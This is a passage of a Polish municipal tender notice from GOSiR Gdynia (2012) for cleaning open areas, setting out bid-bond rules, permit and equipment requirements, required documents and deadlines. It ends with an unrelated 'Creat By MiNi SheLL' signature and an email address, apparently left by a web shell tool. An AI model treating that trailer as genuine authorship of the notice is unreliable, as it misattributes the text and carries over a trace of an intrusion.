3)	zawierać w swojej treści okoliczności, w których gwarant (poręczyciel) wpłaci kwotę wadium Zamawiającemu, wraz z klauzulą mówiącą, że wypłata nastąpi na pierwsze żądanie Zamawiającego bez prawa protestu gwaranta (poręczyciela).
6.	Wykonawca, który nie wniesie wadium w wymaganej formie i terminie zostanie wykluczony z postępowania.
7.	Dokument potwierdzający wniesienie wadium w formie pieniężnej należy załączyć do oferty, bądź złożyć przed upływem terminu składania ofert w sekretariacie GOSiR.
8.	Wadium w formach określonych w ust.2 pkt.2-5, należy załączyć do oferty, bądź złożyć przed upływem terminu składania ofert w sekretariacie GOSiR. Wadium wnoszone w/w formach należy złożyć w oryginale.
9.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 10.
10.	Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na wezwanie o którym mowa w art.26 ust.3 Ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 Ustawy lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
11.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
13.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie ust. 9, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania się spełnieniem warunku posiadania uprawnień do wykonywania przedmiotowego zamówienia, Wykonawca musi wykazać się posiadaniem:
a)	wymaganego prawem zezwolenia na prowadzenie działalności w zakresie odbioru odpadów komunalnych stałych na terenie Gminy Miasta Gdyni wydane zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,
b)	wymaganego prawem zezwolenia na prowadzenie działalności w zakresie transportu odpadów wydane zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach uprawniające do prowadzenia tej działalności także na terenie Gminy Miasta Gdyni.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania się spełnieniem warunku posiadania niezbędnej wiedzy i doświadczenia, Wykonawca musi wykazać się należytym wykonaniem lub wykonywaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres jego działalności jest krótszy - w tym okresie, co najmniej jednego zlecenia o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia w zakresie oczyszczania terenów otwartych, na kwotę nie niższą jednak niż 300.000,00 zł (słownie: trzysta tysięcy zł) brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania się spełnieniem warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Wykonawca musi wykazać się, że dysponuje (jako właściciel lub na podstawie innego tytułu prawnego uprawniającego do korzystania z rzeczy takiego jak umowa leasingu, dzierżawy, najmu lub inna umowa o podobnym charakterze) niezbędnym sprzętem do prawidłowej realizacji zamówienia w zakresie co najmniej poniższego sprzętu:
a)	ciągniki rolnicze - minimum 6 sztuk, 
b)	przesiewarka do piasku o wydajności co najmniej 1,5 ha/godz.- minimum 3 sztuki, 
c)	przesiewarka do piasku o wydajności co najmniej 0,3 ha/godz. - minimum 1 sztuka, 
d)	grabie do zagrabiania mechanicznego piasku - minimum 2 sztuki, 
e)	kultywator - minimum 1 sztuka,
f)	kontenery na odpady - 2 sztuki (na ewentualne składowanie odpadów w dni wolne od pracy, kiedy wysypisko jest nieczynne),
g)	zamiatarka mechaniczna samojezdna o masie własnej poniżej 1 tony przeznaczona do zamiatania chodników.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje, że wprowadzenie zmian do zawartej umowy możliwe będzie w sytuacjach, gdy Zamawiający uzna, że zmiany te są niezbędne celem zapewnienia prawidłowego wykonania umowy przez strony, w szczególności w następujących przypadkach :
1)	omyłek pisarskich lub błędów rachunkowych, 
2)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami, 
3)	konieczności zmiany sposobu wykonania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych,
4)	konieczności zmiany terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę, 
5)	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gosirgdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gdyński Ośrodek Sportu i Rekreacji
ul. Olimpijska 5/9
81-538 Gdynia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 09:30, miejsce: Ofertę należy złożyć w sekretariacie Zamawiającego (Gdynia 81-538, ul. Olimpijska 5/9).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com